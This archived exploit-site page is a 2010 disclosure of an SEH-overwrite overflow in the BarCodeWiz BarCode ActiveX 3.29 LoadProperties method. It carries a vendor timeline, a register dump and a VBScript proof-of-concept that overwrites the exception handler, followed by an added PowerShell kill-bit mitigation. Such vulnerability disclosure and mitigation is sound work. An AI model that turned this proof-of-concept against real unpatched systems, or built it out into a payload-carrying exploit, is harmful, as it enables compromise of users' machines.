<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>BarCodeWiz BarCode ActiveX 3.29 PoC</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================
BarCodeWiz BarCode ActiveX 3.29 PoC
===================================

# BarCodeWiz Barcode ActiveX Control 3.29 PoC (SEH)
# Bug found: 24th July 2010
# Found by: loneferret
# Software: http://www.barcodewiz.com/

# Vulnerable file BarCodeWiz.dll
# LoadProperties method

# Tested on:
# Windows XP Professional SP3 &amp; Windows XP Home SP3
# Internet Explorer 6 &amp; Internet Explorer 7

# Vendor contacted: 24th July 2010
# Vendor first reply: 26th July 2010: Wanting more information
# Vendor contacted: 26th July 2010: Sent 2 proof of concepts files
# Vendor contacted: 29 July 2010: Asked for update
# No Response from vendor: 30 July 2010
# Public Release : 30 July 2010

# CPU Registers Information
#
# EAX 7EFEFEFE
# ECX 0013FBF8 ASCII &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA……………..
# EDX 41414141
# EBX 01AB3D68
# ESP 0013AC94
# EBP 0013AD48
# ESI 00000000
# EDI 0013FFFD
# EIP 1002F379 BarcodeW.1002F379
# C 0 ES 0023 32bit 0(FFFFFFFF)
# P 1 CS 001B 32bit 0(FFFFFFFF)
# A 0 SS 0023 32bit 0(FFFFFFFF)
# Z 1 DS 0023 32bit 0(FFFFFFFF)
# S 0 FS 003B 32bit 7FFDF000(FFF)
# T 0 GS 0000 NULL
# D 0
# O 0 LastErr ERROR_SUCCESS (00000000)
# EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
# ST0 empty -??? FFFF 00690069 00690069
# ST1 empty -??? FFFF 00F000F0 00F000F0
# ST2 empty -??? FFFF 00690058 00570054
# ST3 empty -??? FFFF 00EF00C9 00C600C1
# ST4 empty -NAN FFFF FFD9D7D2 FFEEEDEB
# ST5 empty -??? FFFF 00F000C9 00C700C2
# ST6 empty 1.0000000000000000000
# ST7 empty 2838.0000000000000000
# 3 2 1 0 E S P U O Z D I
# FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ)
# FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1

# SEH Information
#
# SEH chain of main thread, item 0
# Address=0013E574
# SE handler=41414141

# SEH is overwritten starting at the 101st position of our buffer.

----HTML FILE FROM HERE ON-----
&lt;html&gt;
&lt;object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='target'&gt;&lt;/object&gt;
&lt;script language='vbscript'&gt;

buffer = String(101,&quot;A&quot;)
SEH = String(4, &quot;B&quot;)
buffer2 = String(1895, &quot;C&quot;)

arg1 = buffer + SEH + buffer2

target.LoadProperties arg1

&lt;/script&gt;

Barcodewiz 3.29
&lt;/html&gt;
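Mitigation note (added here; not part of the original advisory). Until a fixed build is available, the control can be blocked from being instantiated by Internet Explorer by setting the ActiveX "kill bit" for its CLSID. The mechanism is Microsoft's documented one (Compatibility Flags = 0x400 under the ActiveX Compatibility key); the CLSID is the one used in the PoC above. The function names Set-ActiveXKillBit and Test-ActiveXKillBit are my own, not anything shipped by the vendor or by Microsoft. Run as Administrator.

```powershell
# Added example: set and verify the IE kill bit for the BarCodeWiz control.
# CLSID taken from the PoC above; function names are this example's own.
$clsid   = '{CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}'
$keyPath = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"

function Set-ActiveXKillBit {
    param([string]$Path)
    # Create the per-CLSID key if it does not exist, then set the kill-bit flag (0x400).
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    New-ItemProperty -Path $Path -Name 'Compatibility Flags' -PropertyType DWord -Value 0x400 -Force | Out-Null
}

function Test-ActiveXKillBit {
    param([string]$Path)
    # Returns $true only when the 0x400 bit is present in 'Compatibility Flags'.
    $flags = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    return ($null -ne $flags) -and (($flags -band 0x400) -eq 0x400)
}

Set-ActiveXKillBit -Path $keyPath
if (Test-ActiveXKillBit -Path $keyPath) {
    "Kill bit set for $clsid - Internet Explorer will refuse to load this control."
} else {
    "Kill bit NOT set for $clsid - check that the shell is elevated."
}
```

Two caveats: on 64-bit Windows the same value must also be written under the Wow6432Node branch of the key for 32-bit Internet Explorer, and the kill bit only stops Internet Explorer from instantiating the control; any other host that loads BarCodeWiz.dll directly still exposes the LoadProperties overflow until the DLL itself is fixed.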

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-30]</pre></body></html>
Source: http://inj3ct0r.com/exploits/13518